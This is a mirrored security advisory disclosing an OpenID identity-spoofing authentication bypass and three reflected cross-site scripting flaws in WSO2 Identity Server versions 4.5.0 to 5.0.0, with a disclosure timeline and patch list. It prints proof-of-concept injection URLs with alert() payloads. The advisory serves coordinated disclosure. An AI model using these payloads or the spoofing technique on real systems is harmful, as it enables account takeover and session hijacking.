Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32113
HistoryMay 12, 2015 - 12:00 a.m.

WSO2 Identity Server multiple vulnerabilities

2015-05-1200:00:00
vulners.com
72
JSON

Hi,

WSO2 Identity Server (http://wso2.com/products/identity-server/) version
4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including
authentication bypass.

Timeline:

09.10.2014 - Vendor notified
22.11.2014 - Vendor confirmed
04.12.2014 - Patches released
25.03.2015 - Bugtraq disclosure

Vulnerable versions:

IS 4.5.0
IS 4.6.0
IS 5.0.0

Fixed versions:

IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932
IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933
IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930
IS 5.0.0 + Service Pack 1

Vulnerabilities details:

1) Identity spoofing/authentication bypass. Attacker need to log in to
WSO2 IS to obtain valid HTTP session. Given this session he/she can
request OpenID assertion from WSO2 IS to any identity
(openid.identity). Thus any authenticated user is able to spoof any
identity he/she requests, in order to login to RP as user of his/her will.

2) XSS A - HTML injection

https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e

3) XSS B - HTML injection

https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&amp;openid.claimed_id=https://example.com/test&amp;relyingParty=https://ww.wp.pl&amp;sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e&#37;27&#37;2f&#37;3e&#37;3c&#37;73&#37;63&#37;72&#37;69&#37;70&#37;74&#37;3eeval&#40;&quot;ale&quot;&#37;2b&quot;rt&#40;1&#41;&quot;&#41;&#37;3c&#37;2f&#37;73&#37;63&#37;72&#37;69&#37;70&#37;74&#37;3e&amp;type=openid&amp;commonAuthCallerPath=&#37;2Fopenidserver&amp;username=test&amp;authenticators=BasicAuthenticator:LOCAL

4) XSS C - JavaScript injection

https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&amp;openid.claimed_id=https://example.com/test&amp;relyingParty=https://ww.wp.pl&amp;sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa&quot;&#37;0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL

regards
– Bartlomiej Balcerek WCSS CSIRT Wroclaw Centre for Networking and Supercomputing Wroclaw University of Technology, Poland phone: +48 (71) 320-20-79 mail: [email protected]

JSON